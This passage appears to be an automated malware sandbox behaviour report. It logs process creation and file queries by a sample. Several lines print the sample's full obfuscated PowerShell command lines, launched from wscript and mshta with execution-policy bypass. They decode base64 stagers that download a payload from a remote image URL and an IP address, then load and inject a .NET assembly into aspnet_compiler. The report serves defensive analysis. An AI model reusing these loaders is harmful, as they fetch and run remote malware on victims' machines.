                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jghvngjxicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbzgqtdhlwrsagicagicagicagicagicagicagicagicagicagicaglw1fbujfcmrlrmloavrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt04uzgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagifftuwgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbelhn0cmluzyagicagicagicagicagicagicagicagicagicagicags0xhevvlcuplbyx1aw50icagicagicagicagicagicagicagicagicagicagicbktsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietwqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5bbwugicagicagicagicagicagicagicagicagicagicagicjqempoiiagicagicagicagicagicagicagicagicagicagicaglu5bbuvtcefdzsagicagicagicagicagicagicagicagicagicagicagckluu0jxeulcicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakag80ylc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4zlzc4nc92zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz29vzc50suyilcikrw52okfquerbvefcdmvyewdyzwf0dhjhzmzpy3dpdghuawnld29ya2luz3nrawxsdg9izwdvlnziuyismcwwkttzvefydc1ttgvlccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvx2zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz28udmjtig=='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jghvngjxicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbzgqtdhlwrsagicagicagicagicagicagicagicagicagicagicaglw1fbujfcmrlrmloavrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt04uzgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagifftuwgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbelhn0cmluzyagicagicagicagicagicagicagicagicagicagicags0xhevvlcuplbyx1aw50icagicagicagicagicagicagicagicagicagicagicbktsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietwqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5bbwugicagicagicagicagicagicagicagicagicagicagicjqempoiiagicagicagicagicagicagicagicagicagicagicaglu5bbuvtcefdzsagicagicagicagicagicagicagicagicagicagicagckluu0jxeulcicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakag80ylc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4zlzc4nc92zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz29vzc50suyilcikrw52okfquerbvefcdmvyewdyzwf0dhjhzmzpy3dpdghuawnld29ya2luz3nrawxsdg9izwdvlnziuyismcwwkttzvefydc1ttgvlccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvx2zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz28udmjtig=='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $olhento = 'jgnoyxjjbya9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrjb21wb3npdgl2bya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgfydm9yawzvcm1lid0gjgnvbxbvc2l0axzvlkrvd25sb2fkrgf0ysgky2hhcmnvktskchjvbwv0zwrvcia9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrhcnzvcmlmb3jtzsk7jgz1c2npdgugpsanpdxcqvnfnjrfu1rbulq+pic7jhrhdmlsysa9icc8pejbu0u2nf9ftkq+pic7jg1pbmlzdgvyawfsbwvudgugpsakchjvbwv0zwrvci5jbmrlee9mkcrmdxnjaxrlktskzgvzy3j1emfyid0gjhbyb21ldgvkb3iusw5kzxhpzigkdgf2awxhktskbwluaxn0zxjpywxtzw50zsatz2ugmcatyw5kicrkzxnjcnv6yxiglwd0icrtaw5pc3rlcmlhbg1lbnrloyrtaw5pc3rlcmlhbg1lbnrlics9icrmdxnjaxrllkxlbmd0adskzg9pzgvqyw50zsa9icrkzxnjcnv6yxiglsakbwluaxn0zxjpywxtzw50ztsky2fzy2v0ysa9icrwcm9tzxrlzg9ylln1ynn0cmluzygkbwluaxn0zxjpywxtzw50zswgjgrvawrlamfudgupoyr0cmljagluywrvid0glwpvaw4gkcrjyxnjzxrhllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrjyxnjzxrhlkxlbmd0acldoyr0cmvzy2fsyw50zsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhryawnoaw5hzg8poyrkawfszwn0bya9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojhryzxnjywxhbnrlktskbw9zbgvtaxrhid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jg1vc2xlbwl0ys5jbnzva2uojg51bgwsieaoj3r4dc5nqvjstufdlzq4ny8zljmyms41ndiumjcxly86chr0accsicckbw92zwrvcicsicckbw92zwrvcicsicckbw92zwrvcicsicdhc3buzxrfy29tcglszxinlcanjg1vdmvkb3inlcanjg1vdmvkb3inlcckbw92zwrvcicsjyrtb3zlzg9yjywnjg1vdmvkb3inlcckbw92zwrvcicsjyrtb3zlzg9yjywnmscsjyrtb3zlzg9yjykpow==';$amenista = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($olhento));invoke-expression $amenista
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jghvngjxicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbzgqtdhlwrsagicagicagicagicagicagicagicagicagicagicaglw1fbujfcmrlrmloavrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt04uzgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagifftuwgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbelhn0cmluzyagicagicagicagicagicagicagicagicagicagicags0xhevvlcuplbyx1aw50icagicagicagicagicagicagicagicagicagicagicbktsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietwqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5bbwugicagicagicagicagicagicagicagicagicagicagicjqempoiiagicagicagicagicagicagicagicagicagicagicaglu5bbuvtcefdzsagicagicagicagicagicagicagicagicagicagicagckluu0jxeulcicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakag80ylc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4zlzc4nc92zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz29vzc50suyilcikrw52okfquerbvefcdmvyewdyzwf0dhjhzmzpy3dpdghuawnld29ya2luz3nrawxsdg9izwdvlnziuyismcwwkttzvefydc1ttgvlccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvx2zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz28udmjtig=='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jghvngjxicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbzgqtdhlwrsagicagicagicagicagicagicagicagicagicagicaglw1fbujfcmrlrmloavrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt04uzgxmiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagifftuwgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbelhn0cmluzyagicagicagicagicagicagicagicagicagicagicags0xhevvlcuplbyx1aw50icagicagicagicagicagicagicagicagicagicagicbktsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietwqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5bbwugicagicagicagicagicagicagicagicagicagicagicjqempoiiagicagicagicagicagicagicagicagicagicagicaglu5bbuvtcefdzsagicagicagicagicagicagicagicagicagicagicagckluu0jxeulcicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakag80ylc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4zlzc4nc92zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz29vzc50suyilcikrw52okfquerbvefcdmvyewdyzwf0dhjhzmzpy3dpdghuawnld29ya2luz3nrawxsdg9izwdvlnziuyismcwwkttzvefydc1ttgvlccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvx2zxj5z3jlyxr0cmfmzmljd2l0ag5py2v3b3jraw5nc2tpbgx0b2jlz28udmjtig=='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $olhento = 'jgnoyxjjbya9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrjb21wb3npdgl2bya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgfydm9yawzvcm1lid0gjgnvbxbvc2l0axzvlkrvd25sb2fkrgf0ysgky2hhcmnvktskchjvbwv0zwrvcia9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrhcnzvcmlmb3jtzsk7jgz1c2npdgugpsanpdxcqvnfnjrfu1rbulq+pic7jhrhdmlsysa9icc8pejbu0u2nf9ftkq+pic7jg1pbmlzdgvyawfsbwvudgugpsakchjvbwv0zwrvci5jbmrlee9mkcrmdxnjaxrlktskzgvzy3j1emfyid0gjhbyb21ldgvkb3iusw5kzxhpzigkdgf2awxhktskbwluaxn0zxjpywxtzw50zsatz2ugmcatyw5kicrkzxnjcnv6yxiglwd0icrtaw5pc3rlcmlhbg1lbnrloyrtaw5pc3rlcmlhbg1lbnrlics9icrmdxnjaxrllkxlbmd0adskzg9pzgvqyw50zsa9icrkzxnjcnv6yxiglsakbwluaxn0zxjpywxtzw50ztsky2fzy2v0ysa9icrwcm9tzxrlzg9ylln1ynn0cmluzygkbwluaxn0zxjpywxtzw50zswgjgrvawrlamfudgupoyr0cmljagluywrvid0glwpvaw4gkcrjyxnjzxrhllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrjyxnjzxrhlkxlbmd0acldoyr0cmvzy2fsyw50zsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhryawnoaw5hzg8poyrkawfszwn0bya9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojhryzxnjywxhbnrlktskbw9zbgvtaxrhid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jg1vc2xlbwl0ys5jbnzva2uojg51bgwsieaoj3r4dc5nqvjstufdlzq4ny8zljmyms41ndiumjcxly86chr0accsicckbw92zwrvcicsicckbw92zwrvcicsicckbw92zwrvcicsicdhc3buzxrfy29tcglszxinlcanjg1vdmvkb3inlcanjg1vdmvkb3inlcckbw92zwrvcicsjyrtb3zlzg9yjywnjg1vdmvkb3inlcckbw92zwrvcicsjyrtb3zlzg9yjywnmscsjyrtb3zlzg9yjykpow==';$amenista = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($olhento));invoke-expression $amenistaJump to behavior
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513325400.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000000.2454783694.0000000001AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
